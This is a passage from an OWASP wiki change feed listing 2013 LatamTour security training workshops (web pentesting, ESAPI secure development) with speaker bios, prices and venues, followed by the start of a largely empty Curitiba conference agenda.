Como miembro de la Fundación OWASP, Fabio se encarga de coordinar actividades globales de concientizacion sobre seguridad de aplicaciones con empresas privadas, gobiernos e instituciones educativas.&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Duracion:''' 8 horas&lt;br /&gt;
&lt;br /&gt;
'''Precio:''' U$S200 No miembros / U$150 Miembros OWASP. Existen tambien descuentos para grupos.&lt;br /&gt;
&lt;br /&gt;
'''Para mayor informacion y registro''': [http://www.regonline.com/latamtour13uiotraining2 HAGA CLIC AQUI!]'''&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; | [[Image:Rpulgar.JPG|150px]]&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;left&amp;quot; | '''Taller: Penetration Testing de Aplicaciones Web'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Las pruebas de intrusión a aplicaciones web son auditorías de seguridad en las que el penetration tester actúa como lo haría un posible atacante, pero con autorización; con el objetivo de analizar, encontrar y explotar vulnerabilidades de aplicaciones web corporativas.&lt;br /&gt;
El curso se basará en el OWASP Top 10 y en OWASP Testing Guide, como marcos de referencia para realizar todo el proceso de pentest de aplicaciones web.&lt;br /&gt;
&lt;br /&gt;
'''Perﬁl del orador'''&lt;br /&gt;
&lt;br /&gt;
Ramiro Pulgar es Pentester e Investigador Forense de Blue Hat Consultores con mas de 12 años de experiencia en el campo de IT y seguridad informática, quien ha liderado y desarrollado proyectos en Ecuador y Colombia. También se ha desarrollado como instructor certificado EC-Council en varios países de Latinoamerica. Dentro de sus certificaciones se encuentra: LPT, CEI, CHFI, ECSA, CEH, ENSA, ECIH, RHCE, CCA, CCSE.&lt;br /&gt;
&lt;br /&gt;
Fundó el capítulo OWASP en Ecuador en el año 2010, y se ha desarrollado como líder y concientizador de OWASP, tanto a nivel comunitario, universitario, corporativo y gubernamental en Latinoamerica.&lt;br /&gt;
 &lt;br /&gt;
'''Prerequisitos:'''&lt;br /&gt;
&lt;br /&gt;
Una laptop con mínimo 4GB en RAM y 120GB de espacio en disco disponible.&lt;br /&gt;
&lt;br /&gt;
'''Duracion:''' 8 horas&lt;br /&gt;
&lt;br /&gt;
'''Precio:''' U$S200 No miembros / U$S150 Miembros OWASP. Existen tambien descuentos para grupos.&lt;br /&gt;
&lt;br /&gt;
'''Para mayor informacion y registro''': [http://www.regonline.com/latamtour13uiotraining1 HAGA CLIC AQUI!]'''&amp;lt;br&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
|-&lt;br /&gt;
| align=&amp;quot;center&amp;quot; style=&amp;quot;background: #4B0082;&amp;quot; colspan=&amp;quot;2&amp;quot; | &amp;lt;span style=&amp;quot;color:#ffffff&amp;quot;&amp;gt;'''MONTEVIDEO - URUGUAY'''&amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:20%&amp;quot; valign=&amp;quot;middle&amp;quot;  bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Fecha''' &lt;br /&gt;
| style=&amp;quot;width:80%&amp;quot; valign=&amp;quot;middle&amp;quot;  bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Lugar'''&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#dbdbf3&amp;quot; align=&amp;quot;center&amp;quot; | Martes 2 de abril de 2013&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#dbdbf3&amp;quot; align=&amp;quot;left&amp;quot; | Universidad Catolica del Uruguay&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; | [[Image:Cerullof.jpg|150px]]&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;left&amp;quot; | '''Taller: Desarrollo Seguro usando OWASP ESAPI'''&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Este curso tiene como objetivo proporcionar los conocimientos y recursos necesarios para mejorar la seguridad de las aplicaciones Java utilizando las librerias OWASP Enterprise Security API (ESAPI). Estas librerias se han diseñado para que sea más fácil para los desarrolladores mejorar la seguridad en aplicaciones existentes, como asi tambien utilizarlas como base para el desarrollo de nuevas aplicaciones. Los principios generales aprendidos en el curso se puede aplicar en el contexto de otros lenguajes de programación.&lt;br /&gt;
&lt;br /&gt;
'''Perﬁl del orador'''&lt;br /&gt;
&lt;br /&gt;
Fabio Cerullo, CEO y fundador de Cycubix, ayuda a clientes de todo el mundo a mejorar la seguridad de aplicaciones desarrolladas internamente o por terceros, mediante la definición de políticas y normas, implementando iniciativas de desarrollo seguro y gestión de riesgos, así como brindando capacitación sobre el tema a desarrolladores, auditores, ejecutivos y profesionales.&amp;lt;br&amp;gt;&lt;br /&gt;
Como miembro de la Fundación OWASP, Fabio se encarga de coordinar actividades globales de concientizacion sobre seguridad de aplicaciones con empresas privadas, gobiernos e instituciones educativas.&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Duracion:''' 8 horas&lt;br /&gt;
&lt;br /&gt;
'''Precio:''' U$S300 No miembros / U$S250 Miembros OWASP. Existen tambien descuentos para grupos.&lt;br /&gt;
&lt;br /&gt;
'''Para mayor informacion y registro''': [http://www.regonline.com/latamtour13urutrainingesapi HAGA CLIC AQUI!]'''&amp;lt;br&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; | [[Image:Cristian-borghello-P.jpg|150px]]&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;left&amp;quot; | '''OWASP para Pentesters'''&lt;br /&gt;
&lt;br /&gt;
Los desarrolladores son una raza extraña. Los Pentesters viven en una burbuja. Este entrenamiento ayuda a los desarrolladores a conocer sobre seguridad en el desarrollo web y a los Pentesters a probar aplicaciones web de forma adecuada.&lt;br /&gt;
&lt;br /&gt;
Orientado a desarrolladores, pentesters y personas relacionados con el ciclo de vida del desarrollo de software o sus pruebas de seguridad.&lt;br /&gt;
&lt;br /&gt;
'''Nivel:''' Intermedio&lt;br /&gt;
&lt;br /&gt;
'''Objetivos:'''&lt;br /&gt;
&lt;br /&gt;
- Conocer OWASP Top 10 (quick summary)&lt;br /&gt;
- Aprender cómo comprobar cada vulnerabilidad desde el punto de vista del Desarrollador y del Pentester&lt;br /&gt;
- Conocer recomendaciones desde el punto de vista del Pentester&lt;br /&gt;
- Conocer recomendaciones desde el punto de vista del Desarrollador&lt;br /&gt;
&lt;br /&gt;
'''Perfil del orador'''&lt;br /&gt;
&lt;br /&gt;
Cristian F. Borghello, es Licenciado en Sistemas, desarrollador, Certified Information Systems Security Professional (CISSP) y Microsoft MVP Security (Most Valuable Professional). Actualmente es Director de Segu-Info y se desempeña como consultor independiente en Seguridad de la Información. Escribe para diversos medios especializados e investiga en forma independiente sobre Seguridad Informática y de la Información. Ha disertado se congresos y seminarios nacionales e internacionales sobre la temática. El interés por la Seguridad Informática y su investigación lo ha llevado a mantener este sitio: http://www.segu-info.com.ar/ Cristian es miembro del capítulo Buenos Aires de OWASP, asi como de los capítulos ISSA (Information Systems Security Association), CSA (Cloud Security Alliance) e ISC2 Argentina.&lt;br /&gt;
&lt;br /&gt;
'''Duracion:''' 8 horas&lt;br /&gt;
&lt;br /&gt;
'''Precio:''' U$S300 No miembros / U$S250 Miembros OWASP. Existen tambien descuentos para grupos.&lt;br /&gt;
&lt;br /&gt;
'''Para mayor informacion y registro''': [http://www.regonline.com/latamtour13urutrainingpentest HAGA CLIC AQUI!]'''&amp;lt;br&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| align=&amp;quot;center&amp;quot; style=&amp;quot;background: #4B0082;&amp;quot; colspan=&amp;quot;2&amp;quot; | &amp;lt;span style=&amp;quot;color:#ffffff&amp;quot;&amp;gt;'''BUENOS AIRES - ARGENTINA'''&amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:20%&amp;quot; valign=&amp;quot;middle&amp;quot;  bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Fecha''' &lt;br /&gt;
| style=&amp;quot;width:80%&amp;quot; valign=&amp;quot;middle&amp;quot;  bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Lugar'''&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#dbdbf3&amp;quot; align=&amp;quot;center&amp;quot; | Jueves 4 de abril de 2013&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#dbdbf3&amp;quot; align=&amp;quot;left&amp;quot; | Globant - Oficina South Park - Humberto Primo 53 (esq. Av. Ing. Huergo), Ciudad de Buenos Aires&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; | [[Image:Cerullof.jpg|150px]]&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;left&amp;quot; | '''Taller: Desarrollo Seguro usando OWASP ESAPI'''&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Este curso tiene como objetivo proporcionar los conocimientos y recursos necesarios para mejorar la seguridad de las aplicaciones Java utilizando las librerias OWASP Enterprise Security API (ESAPI). Estas librerias se han diseñado para que sea más fácil para los desarrolladores mejorar la seguridad en aplicaciones existentes, como asi tambien utilizarlas como base para el desarrollo de nuevas aplicaciones. Los principios generales aprendidos en el curso se puede aplicar en el contexto de otros lenguajes de programación.&lt;br /&gt;
&lt;br /&gt;
'''Perﬁl del orador'''&lt;br /&gt;
&lt;br /&gt;
Fabio Cerullo, CEO y fundador de Cycubix, ayuda a clientes de todo el mundo a mejorar la seguridad de aplicaciones desarrolladas internamente o por terceros, mediante la definición de políticas y normas, implementando iniciativas de desarrollo seguro y gestión de riesgos, así como brindando capacitación sobre el tema a desarrolladores, auditores, ejecutivos y profesionales.&amp;lt;br&amp;gt;&lt;br /&gt;
Como miembro de la Fundación OWASP, Fabio se encarga de coordinar actividades globales de concientizacion sobre seguridad de aplicaciones con empresas privadas, gobiernos e instituciones educativas.&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Duracion:''' 8 horas&lt;br /&gt;
&lt;br /&gt;
'''Precio:''' U$S300 No miembros / U$S250 Miembros OWASP. Existen tambien descuentos para grupos.&lt;br /&gt;
&lt;br /&gt;
'''Para mayor informacion y registro''': [http://www.regonline.com/latamtour13argtrainingesapi HAGA CLIC AQUI!]'''&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; | [[Image:Cristian-borghello-P.jpg|150px]]&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;left&amp;quot; | '''OWASP para Pentesters'''&lt;br /&gt;
&lt;br /&gt;
Los desarrolladores son una raza extraña. Los Pentesters viven en una burbuja. Este entrenamiento ayuda a los desarrolladores a conocer sobre seguridad en el desarrollo web y a los Pentesters a probar aplicaciones web de forma adecuada.&lt;br /&gt;
&lt;br /&gt;
Orientado a desarrolladores, pentesters y personas relacionados con el ciclo de vida del desarrollo de software o sus pruebas de seguridad.&lt;br /&gt;
&lt;br /&gt;
'''Nivel:''' Intermedio&lt;br /&gt;
&lt;br /&gt;
'''Objetivos:'''&lt;br /&gt;
&lt;br /&gt;
- Conocer OWASP Top 10 (quick summary)&lt;br /&gt;
- Aprender cómo comprobar cada vulnerabilidad desde el punto de vista del Desarrollador y del Pentester&lt;br /&gt;
- Conocer recomendaciones desde el punto de vista del Pentester&lt;br /&gt;
- Conocer recomendaciones desde el punto de vista del Desarrollador&lt;br /&gt;
&lt;br /&gt;
'''Perfil del orador'''&lt;br /&gt;
&lt;br /&gt;
Cristian F. Borghello, es Licenciado en Sistemas, desarrollador, Certified Information Systems Security Professional (CISSP) y Microsoft MVP Security (Most Valuable Professional). Actualmente es Director de Segu-Info y se desempeña como consultor independiente en Seguridad de la Información. Escribe para diversos medios especializados e investiga en forma independiente sobre Seguridad Informática y de la Información. Ha disertado se congresos y seminarios nacionales e internacionales sobre la temática. El interés por la Seguridad Informática y su investigación lo ha llevado a mantener este sitio: http://www.segu-info.com.ar/ Cristian es miembro del capítulo Buenos Aires de OWASP, asi como de los capítulos ISSA (Information Systems Security Association), CSA (Cloud Security Alliance) e ISC2 Argentina.&lt;br /&gt;
&lt;br /&gt;
'''Duracion:''' 8 horas&lt;br /&gt;
&lt;br /&gt;
'''Precio:''' U$S300 No miembros / U$S250 Miembros OWASP. Existen tambien descuentos para grupos.&lt;br /&gt;
&lt;br /&gt;
'''Para mayor informacion y registro''': [http://www.regonline.com/latamtour13argtrainingpentest HAGA CLIC AQUI!]'''&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
|} &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
{|style=&amp;quot;vertical-align:top;width:90%;background-color:#white;padding:10px;border:1px solid silver;&amp;quot; align=&amp;quot;center&amp;quot; cellspacing=&amp;quot;5&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;/div&gt;</summary>
		<author><name>Wagner.elias</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=LatamTour2013_CUR_Agenda&amp;diff=147475</id>
		<title>LatamTour2013 CUR Agenda</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=LatamTour2013_CUR_Agenda&amp;diff=147475"/>
				<updated>2013-03-11T12:17:20Z</updated>
		
		<summary type="html">&lt;p&gt;Wagner.elias: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;noinclude&amp;gt;{{:LatamTour2013 header}}&amp;lt;/noinclude&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{|style=&amp;quot;vertical-align:top;width:90%;background-color:#white;padding:10px;border:1px solid silver;&amp;quot; align=&amp;quot;center&amp;quot; cellspacing=&amp;quot;5&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
| align=&amp;quot;center&amp;quot; height=&amp;quot;30&amp;quot; style=&amp;quot;background:#CCCCEE;&amp;quot; colspan=&amp;quot;2&amp;quot;       | '''Treinamento e Conferência''' &lt;br /&gt;
|-&lt;br /&gt;
| align=&amp;quot;center&amp;quot; style=&amp;quot;background:#EEEEEE;&amp;quot; colspan=&amp;quot;2&amp;quot;                   | &lt;br /&gt;
== '''OWASP Latam Tour - Curitiba 2013''' == &lt;br /&gt;
'''Segunda 25 de Março''' ''(Treinamento 8h - Pago)'' &amp;lt;br&amp;gt;'''Terça 26 de Março''' ''(Conferência - Gratuita)''&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;center&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;2&amp;quot;             | '''Descrição e Objetivo'''&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;left&amp;quot; height=&amp;quot;80&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;left&amp;quot; colspan=&amp;quot;2&amp;quot; | '''OWASP LATAM TOUR,''' é um evento que passa pela América Latina promovendo a segurança em aplicações web em várias instituições, tais como universidades, órgãos governamentais, empresas de TI e as instituições financeiras que procuram criar a consciência de segurança em aplicações e pode tomar decisões sobre os verdadeiros riscos de segurança.&lt;br /&gt;
&lt;br /&gt;
* Além do OWASP Top 10, a maioria dos [[:Category:OWASP_Project|Projetos OWASP]] não são amplamente utilizados nos ambientes corporativos. Na maioria dos casos isso não é devido a falta de qualidade nos projetos ou documentação disponível, mas sim aonde se encaixariam em um Ecosistema de Segurança de Aplicações empresarial.&lt;br /&gt;
&lt;br /&gt;
* Este evento tem como objetivo alterar este cenário oferecendo uma explicação de alguns dos projetos OWASP mais maduros e prontos para uso no negócio, além de treinamentos e palestras &lt;br /&gt;
|-&lt;br /&gt;
| align=&amp;quot;center&amp;quot; style=&amp;quot;background:#CCCCEE;&amp;quot; colspan=&amp;quot;2&amp;quot; | '''Promoção'''&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;left&amp;quot; height=&amp;quot;80&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;2&amp;quot; | OFERTA ESPECIAL - Ao longo do OWASP Latam TOUR a taxa de adesão anual é de apenas U$D 20. Use o código de desconto &amp;quot;LATAM&amp;quot; durante o processo de registro de um membro individual do link disponível abaixo.&amp;lt;br&amp;gt;&lt;br /&gt;
[https://www.cvent.com/Events/ContactPortal/Login.aspx?cwstub=15bbcfd1-f49b-4636-ba4e-c9ce70a265e5 Click e seja um membro OWASP] &amp;lt;br&amp;gt;&lt;br /&gt;
'''Se você não é um membro da OWASP, por favor considere fazer parte da nossa organização.'''&lt;br /&gt;
|}&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
{|style=&amp;quot;vertical-align:top;width:90%;background-color:#white;padding:10px;border:1px solid silver;&amp;quot; align=&amp;quot;center&amp;quot; cellspacing=&amp;quot;5&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
| align=&amp;quot;center&amp;quot; style=&amp;quot;background:#4B0082;&amp;quot; colspan=&amp;quot;2&amp;quot; | &amp;lt;span style=&amp;quot;color:#ffffff&amp;quot;&amp;gt; '''Treinamento (Segunda 25 de Março)'''&amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:20%&amp;quot; valign=&amp;quot;middle&amp;quot;  bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Data''' &lt;br /&gt;
| style=&amp;quot;width:80%&amp;quot; valign=&amp;quot;middle&amp;quot;  bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Local'''&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; | ''' Segunda 25 de Março '''&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;left&amp;quot; | '''UP - Universidade Positivo - Rua Professor Pedro Viriato Parigot de Souza, 5.300 - Campo Comprido - Ctba - PR - Fone: (41) 3317-3000&amp;lt;br&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| align=&amp;quot;center&amp;quot; style=&amp;quot;background:#CCCCEE;&amp;quot; colspan=&amp;quot;2&amp;quot; | '''Preço e Registro'''&lt;br /&gt;
|-&lt;br /&gt;
| align=&amp;quot;center&amp;quot; style=&amp;quot;background:#EEEEEE;&amp;quot; colspan=&amp;quot;2&amp;quot; | U$S 300 não membro / U$S 250 membro OWASP &amp;lt;br&amp;gt; Para consultar sobre os detalhes do treinamento acesse o seguinte link : &amp;lt;br&amp;gt; '''[https://www.owasp.org/index.php/LatamTour2013#Training Treinamentos - Mais Informações]''' &amp;lt;br&amp;gt; https://www.owasp.org/index.php/LatamTour2013_Training &amp;lt;br&amp;gt;.Para se registrar acesse o seguinte link : &amp;lt;br&amp;gt; '''[http://www.regonline.com/Register/Checkin.aspx?EventId=1212754]''' &amp;lt;br&amp;gt; http://www.regonline.com/Register/Checkin.aspx?EventId=1212754 &amp;lt;br&amp;gt;.&lt;br /&gt;
|}&amp;lt;br&amp;gt;&lt;br /&gt;
{|style=&amp;quot;vertical-align:top;width:90%;background-color:#white;padding:10px;border:1px solid silver;&amp;quot; align=&amp;quot;center&amp;quot; cellspacing=&amp;quot;5&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
| align=&amp;quot;center&amp;quot; style=&amp;quot;background:#4B0082;&amp;quot; colspan=&amp;quot;2&amp;quot; | &amp;lt;span style=&amp;quot;color:#ffffff&amp;quot;&amp;gt; &lt;br /&gt;
'''Conferência (Terça - 26 de Março)''' &amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:20%&amp;quot; valign=&amp;quot;middle&amp;quot;  bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Fecha''' &lt;br /&gt;
| style=&amp;quot;width:80%&amp;quot; valign=&amp;quot;middle&amp;quot;  bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Lugar'''&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; | ''' Terça 26 de Março '''&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;left&amp;quot; | '''UP - Universidade Positivo - Rua Professor Pedro Viriato Parigot de Souza, 5.300 - Campo Comprido - Ctba - PR - Fone: (41) 3317-3000&lt;br /&gt;
|-&lt;br /&gt;
| align=&amp;quot;center&amp;quot; style=&amp;quot;background:#CCCCEE;&amp;quot; colspan=&amp;quot;2&amp;quot; | '''Preço e Registro'''&lt;br /&gt;
|-&lt;br /&gt;
| align=&amp;quot;center&amp;quot; style=&amp;quot;background:#EEEEEE;&amp;quot; colspan=&amp;quot;2&amp;quot; | A entrada para o evento é ''' LIVRE &amp;quot;'! Faça o seu registro no seguinte link &amp;lt;br&amp;gt;&lt;br /&gt;
 '''Link de Registro al OWASP LATAM TOUR 2013''': [http://www.regonline.com/Register/Checkin.aspx?EventID=1207610 AQUI!]'''&lt;br /&gt;
|-&lt;br /&gt;
|} &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
{|style=&amp;quot;vertical-align:top;width:90%;background-color:#white;padding:10px;border:1px solid silver;&amp;quot; align=&amp;quot;center&amp;quot; cellspacing=&amp;quot;5&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:90%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;40&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;6&amp;quot; | '''Grade de Palestras'''&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Horário''' &lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Assunto'''&lt;br /&gt;
| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Palestrante'''&lt;br /&gt;
| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Detalhes'''&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | 09:00 - 09:15&lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | 09:15 - 10:00&lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | 10:00 - 10:45&lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | 10:45 - 11:15&lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; |&lt;br /&gt;
| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | 11:15 - 11:45&lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
